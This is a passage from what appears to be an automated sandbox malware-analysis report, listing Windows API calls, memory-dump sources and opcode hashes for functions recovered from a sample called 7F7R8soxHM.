                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 20977170fd56c3f0b837bb3b887c41ffa8b4c39a9afa652b6fce8f1ceda7eda3
                      • Instruction ID: 49c0d6bbcf9801b128074110ab43017e9f191c9809a43c162c3c2f4ed4046a0e
                      • Opcode Fuzzy Hash: 20977170fd56c3f0b837bb3b887c41ffa8b4c39a9afa652b6fce8f1ceda7eda3
                      • Instruction Fuzzy Hash: F541E3B590110CAFC710DB28CC44FBDBBA5EB09314F195175EA29BB2E1D770AD41DA51
                      APIs
                      • GetCursorPos.USER32(?), ref: 00E72357
                      • ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                      • GetAsyncKeyState.USER32(00000001), ref: 00E72399
                      • GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AsyncState$ClientCursorScreen
                      • String ID:
                      • API String ID: 4210589936-0
                      • Opcode ID: f407f62b85a6bb5e9ff1469fbb17af99e70a7d79bacd41426f36a203f1ef9888
                      • Instruction ID: ba190f1c86b2fa13795951724431315d7e0e365961b8672004555c489c71b461
                      • Opcode Fuzzy Hash: f407f62b85a6bb5e9ff1469fbb17af99e70a7d79bacd41426f36a203f1ef9888
                      • Instruction Fuzzy Hash: D041813590411AFFDF159F68CC44AE9BBB4FF49324F20931AF928B62A0C7346954DBA1
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EC695D
                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00EC69A9
                      • TranslateMessage.USER32(?), ref: 00EC69D2
                      • DispatchMessageW.USER32(?), ref: 00EC69DC
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EC69EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                      • String ID:
                      • API String ID: 2108273632-0
                      • Opcode ID: e3b67bde0318ff516db4abe8682371237469e63787b32fc6312d55e7c40ec1e0
                      • Instruction ID: dee1c91b7e5e54cb32c37cc3879af8a3252a0fa81c3856ac0bcdef0f773d4eb3
                      • Opcode Fuzzy Hash: e3b67bde0318ff516db4abe8682371237469e63787b32fc6312d55e7c40ec1e0
                      • Instruction Fuzzy Hash: 2A31C531504246AEDB20CF75CD44FB77BA9AF45318F10916DE421E21A1DB36D88BE7A0
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00EC8F12
                      • PostMessageW.USER32(?,00000201,00000001), ref: 00EC8FBC
                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EC8FC4
                      • PostMessageW.USER32(?,00000202,00000000), ref: 00EC8FD2
                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EC8FDA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessagePostSleep$RectWindow
                      • String ID:
                      • API String ID: 3382505437-0
                      • Opcode ID: 7286830d3b3a641c6807e974347c69c8fa803005a142dc1b959539ba6e3b794a
                      • Instruction ID: df7913d166dbd16b402bbb6fd2d27dac8da50c1ec251e63a522ecf91fe3394d7
                      • Opcode Fuzzy Hash: 7286830d3b3a641c6807e974347c69c8fa803005a142dc1b959539ba6e3b794a
                      • Instruction Fuzzy Hash: DD31BC7160025DEFDB14CF68DB48BAE7BA6EB44315F10422DF924E62D0CBB19914CB91
                      APIs
                      • IsWindowVisible.USER32(?), ref: 00ECB6C7
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ECB6E4
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ECB71C
                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ECB742
                      • _wcsstr.LIBCMT ref: 00ECB74C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                      • String ID:
                      • API String ID: 3902887630-0
                      • Opcode ID: 96a1dcb2d927d8fd2a781070d36f9cba781c702c3ec41114b32fa48f33440eba
                      • Instruction ID: 4feb311ad456050645c5766631b345b40afad219e6bebd605d11933a819c868f
                      • Opcode Fuzzy Hash: 96a1dcb2d927d8fd2a781070d36f9cba781c702c3ec41114b32fa48f33440eba
                      • Instruction Fuzzy Hash: 07210732204204BAEB255B79DD4AF7B7BACDF85750F00516EFC05EA1A1EF62CC41D6A0
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • GetWindowLongW.USER32(?,000000F0), ref: 00EFB44C
                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EFB471
                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EFB489
                      • GetSystemMetrics.USER32(00000004), ref: 00EFB4B2
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EE1184,00000000), ref: 00EFB4D0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$Long$MetricsSystem
                      • String ID:
                      • API String ID: 2294984445-0
                      • Opcode ID: ae874e243061dbe0c59642a66ad738ff2bc362162d233a878630d6bb4beb5585
                      • Instruction ID: 581e0dc0ce17a22a051f233e8d215417ffffcf311e639d38b0a81de86d1bed5e
                      • Opcode Fuzzy Hash: ae874e243061dbe0c59642a66ad738ff2bc362162d233a878630d6bb4beb5585
                      • Instruction Fuzzy Hash: 23218071910219AFCB208F39CD04A7A37A5EF09725F149728FA36E61E1F7309810DB80
                      APIs
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC9802
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC9834
                      • __itow.LIBCMT ref: 00EC984C
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC9874
                      • __itow.LIBCMT ref: 00EC9885
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$__itow$_memmove
                      • String ID:
                      • API String ID: 2983881199-0
                      • Opcode ID: 751249cbe77ca97f3bc7a3caa07e7d75519597d20ad792422fa5d01df4f1fe62
                      • Instruction ID: bfff67bce479448297f3d264bde16ef5b4390b24e7004284bdf71ae30fcdf77d
                      • Opcode Fuzzy Hash: 751249cbe77ca97f3bc7a3caa07e7d75519597d20ad792422fa5d01df4f1fe62
                      • Instruction Fuzzy Hash: D921D632700204ABDB149A619D8AFEE3BE8EF4A714F046029F904FB242DA718D46C7D1
                      APIs
                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                      • SelectObject.GDI32(?,00000000), ref: 00E7135C
                      • BeginPath.GDI32(?), ref: 00E71373
                      • SelectObject.GDI32(?,00000000), ref: 00E7139C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      • Opcode ID: 8ba815a5b194f42e08b85cdf206bca239699764fd14a52cb9c746c9a139bc091
                      • Instruction ID: ff6a280ad29b6520507bb42e9f6be264f50622efb16aacf5f269158096583a37
                      • Opcode Fuzzy Hash: 8ba815a5b194f42e08b85cdf206bca239699764fd14a52cb9c746c9a139bc091
                      • Instruction Fuzzy Hash: E7212870800308FFDB119F29DC04BAD7BAAEF08325F15C266F918A61A1D7719995EBA0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: 10c1a5276cf7888eb0f902725587b521009064e471e83919db50294d31ca25a8
                      • Instruction ID: e1b64bf11ef9c789051ff0ea40b1c002a282dfc80735e9eb47fa8bca2cff6117
                      • Opcode Fuzzy Hash: 10c1a5276cf7888eb0f902725587b521009064e471e83919db50294d31ca25a8
                      • Instruction Fuzzy Hash: ED0121B26052067BE505A6124D45FAF73AC9F11398F185059FE08B7283E752DE1292F1
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00ED4D5C
                      • __beginthreadex.LIBCMT ref: 00ED4D7A
                      • MessageBoxW.USER32(?,?,?,?), ref: 00ED4D8F
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ED4DA5
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ED4DAC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                      • String ID:
                      • API String ID: 3824534824-0
                      • Opcode ID: 594b73dddefc21d77fc4b174188db5aa26e98904076828dc24578b88e405049a
                      • Instruction ID: 87c8b2faa21d99560007b0115bd14da1e9424129caafe016feca5d24dfa9b731
                      • Opcode Fuzzy Hash: 594b73dddefc21d77fc4b174188db5aa26e98904076828dc24578b88e405049a
                      • Instruction Fuzzy Hash: 0F1108B2904208BFCB019BA89C08EEB7FADEB99324F144266FD14E3391D671CD05C7A0
                      APIs
                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                      • GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                      • GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                      • HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 842720411-0
                      • Opcode ID: 4803301a0849488dee631f9ed521e659a7974c24b59d806d8dd96807b4e62206
                      • Instruction ID: d6abcb45edd9aca1c3856f0e48b1fed21449eb52124d193ee5cece57c4f3ded9
                      • Opcode Fuzzy Hash: 4803301a0849488dee631f9ed521e659a7974c24b59d806d8dd96807b4e62206
                      • Instruction Fuzzy Hash: 5C016271601204FFDB104FA6DE88DB77B6CFF853557201439F949E2260DA328C15CA60
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5502
                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5510
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5518
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5522
                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: 740d1ff27eb8d7cfcffcb961cb4e886cc3d0fb47cbde87747d77dceac7cbb424
                      • Instruction ID: 5cc83cfb56d5228166632cf500b74e3891ad878137192519c90ceeb43f5bed19
                      • Opcode Fuzzy Hash: 740d1ff27eb8d7cfcffcb961cb4e886cc3d0fb47cbde87747d77dceac7cbb424
                      • Instruction Fuzzy Hash: 63015732D01A29DBCF00EFE9E888AEDBB79FF49701F410066E901B2241DB309655C7A1
                      APIs
                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?,?,00EC799D), ref: 00EC766F
                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC768A
                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC7698
                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?), ref: 00EC76A8
                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC76B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: From$Prog$FreeStringTasklstrcmpi
                      • String ID:
                      • API String ID: 3897988419-0
                      • Opcode ID: 38efce7ae823c843a0f6347018bde03fcb599d4793165def6d65150bbf9c0153
                      • Instruction ID: 380c33b811b4c9fd01fa2130c3476aab4f9d8ac612a057e8a08db7338cf51d65
                      • Opcode Fuzzy Hash: 38efce7ae823c843a0f6347018bde03fcb599d4793165def6d65150bbf9c0153
                      • Instruction Fuzzy Hash: 4701B1B2601604AFDB104F19DD44FAA7FACEF84795F100028FD44E2211EB32DD01DBA0
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8608
                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8612
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8621
                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8628
                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC863E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 4d77caf60dfde2a5223c1d871fe6b3e54cbedcee97390adb2c3401cd55c1e588
                      • Instruction ID: df947a78985c2151f85928ef0c02e90d1006f064ff6fda4e55e7850fe31d1aad
                      • Opcode Fuzzy Hash: 4d77caf60dfde2a5223c1d871fe6b3e54cbedcee97390adb2c3401cd55c1e588
                      • Instruction Fuzzy Hash: 23F04F31201204BFEB104FA6DE89F7B3BACEFC9758B405429F945E6250CB61DC46DA60
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8669
                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8673
                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8682
                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8689
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC869F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 8a73d73e4b41dc43827d74ad2e67d5b0c889d8f9cbe6d31b8211bf6205b71494
                      • Instruction ID: 8f5567f4aea2ba4100f008905095298470561458db123dd6d953b4c6ea44dcdf
                      • Opcode Fuzzy Hash: 8a73d73e4b41dc43827d74ad2e67d5b0c889d8f9cbe6d31b8211bf6205b71494
                      • Instruction Fuzzy Hash: 15F04F71201204AFEB111FA6EE88FB73BACEF89B58B100039F945E6150CF61D955DA60
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00ECC6BA
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ECC6D1
                      • MessageBeep.USER32(00000000), ref: 00ECC6E9
                      • KillTimer.USER32(?,0000040A), ref: 00ECC705
                      • EndDialog.USER32(?,00000001), ref: 00ECC71F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: f98e7e7c6fff17bfcab81abfdd3116a7122959ccf5345c69b8e8c9de76b089ea
                      • Instruction ID: a166cff5629ee4229cb33987c02a8029b7babb888e5a422ed8a93a65bfe15125
                      • Opcode Fuzzy Hash: f98e7e7c6fff17bfcab81abfdd3116a7122959ccf5345c69b8e8c9de76b089ea
                      • Instruction Fuzzy Hash: 40014F30500704ABEB215B21DE4EFA677B8FF44B05F10166EF586F14E1DBE1A959CA80
                      APIs
                      • EndPath.GDI32(?), ref: 00E713BF
                      • StrokeAndFillPath.GDI32(?,?,00EABAD8,00000000,?), ref: 00E713DB
                      • SelectObject.GDI32(?,00000000), ref: 00E713EE
                      • DeleteObject.GDI32 ref: 00E71401
                      • StrokePath.GDI32(?), ref: 00E7141C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: 7946ce3ba0f5eac1d9d28cc25abfe019410ee3c06b241214fdf5b7ec3a80ded1
                      • Instruction ID: 4a05214394a8c87ce34a678e13b17ce685fb38629a5fe180356dce0a3add5977
                      • Opcode Fuzzy Hash: 7946ce3ba0f5eac1d9d28cc25abfe019410ee3c06b241214fdf5b7ec3a80ded1
                      • Instruction Fuzzy Hash: 72F0B230004308BFDB115F2AEC48B683BA6AF4533AF04D265E569A50B1DB318999EF60
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00EDC69D
                      • CoCreateInstance.OLE32(00F02D6C,00000000,00000001,00F02BDC,?), ref: 00EDC6B5
